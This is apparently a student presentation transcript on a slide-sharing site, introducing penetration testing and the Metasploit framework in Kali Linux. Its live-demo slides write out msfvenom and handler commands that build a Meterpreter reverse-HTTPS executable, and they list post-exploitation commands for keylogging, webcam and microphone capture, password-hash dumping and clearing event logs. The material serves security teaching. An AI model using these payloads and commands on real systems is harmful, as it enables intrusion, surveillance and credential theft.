Laura Jaideny Pérez Gómez - A

Slides:



Advertisements
Similar presentations
X Window JianJing Cao (ID #98284). Content Introduction X Window System Function Window Principle How X Window Works Security.
Advertisements

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
.  User groups o Cisco, SQL, Virtualization  Conferences o GrrCON, SQL Saturday  Hands-On o Capture the Flag o Forensics  RSS  Exploit-DB updates.
Armitage and Metasploit Penetration Testing Lab
Presenter: Robbie Corley Organization: KCTCS
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.
METASPLOIT.
11 SUPPORTING LOCAL USERS AND GROUPS Chapter 3. Chapter 3: Supporting Local Users and Groups2 SUPPORTING LOCAL USERS AND GROUPS  Explain the difference.
Computer Security and Penetration Testing
Browser Exploitation Framework (BeEF) Lab
Patching MIT SUS Services IS&T Network Infrastructure Services Team.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
Forensic Artifacts From A Pass The Hash (PtH) Attack
APT29 HAMMERTOSS Jayakrishnan M.
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
Honeypot and Intrusion Detection System
Penetration Testing Training Day Penetration Testing Tools and Techniques – pt 1 Mike Westmacott, IRM plc Supported by.
Kali Linx Attacks Jim Nasto. Window 8 Computer On my Windows 8 64 bit OS machine. I started using a Virtual Machine using Hyper V Manager and shared the.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
A VIRTUAL HONEYPOT FRAMEWORK Author : Niels Provos Publication: Usenix Security Symposium Presenter: Hiral Chhaya for CAP6103.
1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.
Penetration Testing 101 (Boot-camp)
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
Module 1A An Introduction to Metasploit – Based upon Chapter 2 of “Metasploit the Penetration testers guide” Based upon Chapter 2 of “Metasploit the Penetration.
Mark Shtern.  Our life depends on computer systems  Traffic control  Banking  Medical equipment  Internet  Social networks  Growing number of.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
Penetration Testing By Blaze Sterling. Roadmap What is Penetration Testing How is it done? Penetration Testing Tools Kali Linux In depth included tools.
Planning Server Deployments Chapter 1. Server Deployment When planning a server deployment for a large enterprise network, the operating system edition.
.  User groups o Cisco, SQL, Virtualization  Conferences o GrrCON, SQL Saturday  Hands-On o Capture the Flag o Forensics  RSS  Exploit-DB updates.
Penetration Testing with METASPLOIT Am Chaitanya Krishna. A.
PostExploitation CIS 5930/4930 Offensive Computer Security Spring 2014.
CIS 4930 / CIS 5930 Offensive Computer Security Spring 2014 I only edited it again.
Tactical Meterpreter Scripting Carlos PerezDarkoperatorCarlos_perez[at]darkoperator.com DarkoperatorCarlos_perez[at]darkoperator.com.
Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Understanding Cyber Attacks: Technical Aspects of Cyber Kill Chain
Intro to Ethical Hacking
Metasploit Framework (MSF) Fundamentals
Chapter 6: Securing the Cloud
Penetration Testing: Concepts,Attacks and Defence Stratagies
Bypassing Antivirus API
Hacking SQL Server a peek into the dark side by Dustin Prescott
Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT
A Comprehensive Security Assessment of the Westminster College Unix Lab Jacob Shodd.
Hacking SQL Server The best defense is a good offence by Dustin
Malware Reverse Engineering Process
Network Exploitation Tool
Malware Reverse Engineering Process
Metasploit a one-stop hack shop
CIT 480: Securing Computer Systems
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
Intercept X for Server Early Access Program Sophos Tester
Outline Overview Development Tools
RECONNAISSANCE & ENUMERATION
11/17/2018 9:32 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN.
RSS 2000 v3 Product Presentation
HC Hyper-V Module GUI Portal VPS Templates Web Console
Backtrack Metasploit and SET
Web Application Penetration Testing ‘17
Intro to Kali Linux & Tools
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Lecture9: Embedded Network Operating System: cisco IOS
Server Management and Automation Windows Server 2012 R2
Penetration Testing & Network Defense
Lecture 34: Testing II April 24, 2017 Selenium testing script 7/7/2019
Metasploit a short tutorial
Lecture9: Embedded Network Operating System: cisco IOS
Presentation transcript:

Laura Jaideny Pérez Gómez - A01271904 Kevin Geis - A01678014 Arturo Ocampo Pérez - A01271806 Artur Eichler - A01676637

Structure History Facts and figures What is penetration testing? What is Metasploit? Why and when to use? How to use Metasploit in Kali Linux Live demo Conclusion

History 2003 first creation by HD Moore Portable network tool using perl 2007 rewritten in ruby 18 month and 150,000 new code lines needed 2009 acquired by rapid 7 GUI More and faster updates increase of service Start of the have to pay service

Facts&figures

What is penetration testing? Main goal is to attack your own IT system Safely simulate an attack and uncover exposures Solutions provides virtual map Deep understanding to simulate a real attack efficiently Penetration testing tools allow to simulate tactics in hours

Penetration testing Identifies target systems and a particular goal Target White box or Black box Suggest recommendations to reduce risk Simplified as two parts: Discover vulnerabilities Exploit the vulnerabilities Defenses were sufficient Vulnerable to attack Defenses the test defeated

Penetration testing In 2012, 80% IT companies reported at least one security breach Penetration testing Identify vulnerabilities Validate existing controls Develop guidelines for remediation Maintaining information security controls Save thousands of dollars Prevent damage to reputation and consumer confidence Avoid business disruptions

What is metasploit? Computer security project Open source tool Develop exploits, payloads and encoders Design and develop tools for reconnaissance, exploitation and post-exploitation

What is metasploit? It was written in Perl Scripting Language Dual-licensed product Competes with Immunity CANVAS and Security IMPACT It is well-known for its anti-forensic and evasion tools.

Why to use metasploit? Powerful tool Enables exploits to be written easily It can tests with different platforms

When to use metasploit? System administrators Administrators do not know if their system is vulnerable with a given exploit Administrators can check multiple servers Build newer and powerful security testing tools

How to use Metasploit in Kali? Simple Steps 1. Choosing and configuring an exploit 2. Choosing and configuring the payload (encode to prevent IPS detection) 3. Execute the exploit

How to use Metasploit in Kali? Framework is Modular - allowing the combination of any exploit with any payload Payload Exploit for a Vulnerability

How to use Metasploit in Kali? Payloads 2 main categories: Inline (Singel) and Staged Inline: self-contained and completely self alone, no further download from attacker to run the payload needed (bigger in filesize) Staged: creates a network connection between the attacker and victim and load the rest of the payload onto the victim's machine (smaller in filesize) Shell_Bind_tcp, Shell_Reverse_tcp, Meterpreter

How to use Metasploit in Kali? Payloads linux/x64/shell/bind_tcp Linux Command Shell, Bind TCP Stager linux/x64/shell/reverse_tcp Linux Command Shell, Reverse TCP Stager linux/x64/shell_bind_tcp Linux Command Shell, Bind TCP Inline linux/x64/shell_reverse_tcp Linux Command Shell, Reverse TCP Inline windows//x64/shell/bind_tcp Windows x64 Command Shell, Bind TCP Stager windows//x64/shell/reverse_tcp Windows x64 Command Shell, Reverse TCP Stager windows/x64/shell_bind_tcp Windows x64 Command Shell, Bind TCP Inline windows/x64/shell_reverse_tcp Windows x64 Command Shell, Reverse TCP Inline => windows/x64/meterpreter_reverse_https Windows Meterpreter Shell, Reverse HTTPS Inline (x64)

How to use Metasploit in Kali? Metasploit Framework and Metasploit Pro are preinstalled in Kali Linux Start Postgresql and enable start at boot time Initialise Metasploit Database root@kali:~# service postgresql start root@kali:~# update-rc.d postgresql enable root@kali:~# msfdb init

How to use Metasploit in Kali? Metasploit User Interfaces msfconsole interactive console interface (most common) msfcli deprecated command line interface armitage a third party add-on GUI to the MSF

Live demo Creating Reverse HTTPS - Meterpreter payload Using Multi Handler inside Metasploit Framework root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.80.128 LPORT=443 -f exe > reverse_https.exe root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/meterpreter_reverse_https msf exploit(handler) > set LHOST 192.168.80.128 msf exploit(handler) > set LPORT 443 msf exploit(handler) > exploit

Live demo Meterpreter commands download Download a file or directory upload Upload a file or directory arp Display the host ARP cache route View and modify the routing table clearev Clear the event log execute Execute a command kill Terminate a process pkill Terminate processes by name ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry shell Drop into a system command shell shutdown Shuts down the remote computer

Live demo Meterpreter commands sysinfo Gets information about the remote system, such as OS keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop uictl [enable/disable] [keyboard/mouse] Enable/disable mouse/keyboard record_mic -d <sec> Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam hashdump Dumps the contents of the SAM database

Conclusion More than just running exploits across a large range of networks and target machines Having the ability to automate what happens after a successful exploitation Vulnerability scanners don’t actually seize control of a host Anything done post-exploitation Metasploit Toolkit

Sources Maynor, D., et. al. (2007). Metasploit Toolkit. USA: Syngress http://meuslivros.github.io/metasploit/OEBPS/pr04s03.html https://www.rapid7.com/products/metasploit/download/editions/ https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/ https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/ https://en.wikipedia.org/wiki/Penetration_test http://spiresolutions.com/solutions/penetration-testing/ https://www.dataart.com/services/security-testing/penetration-testing

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.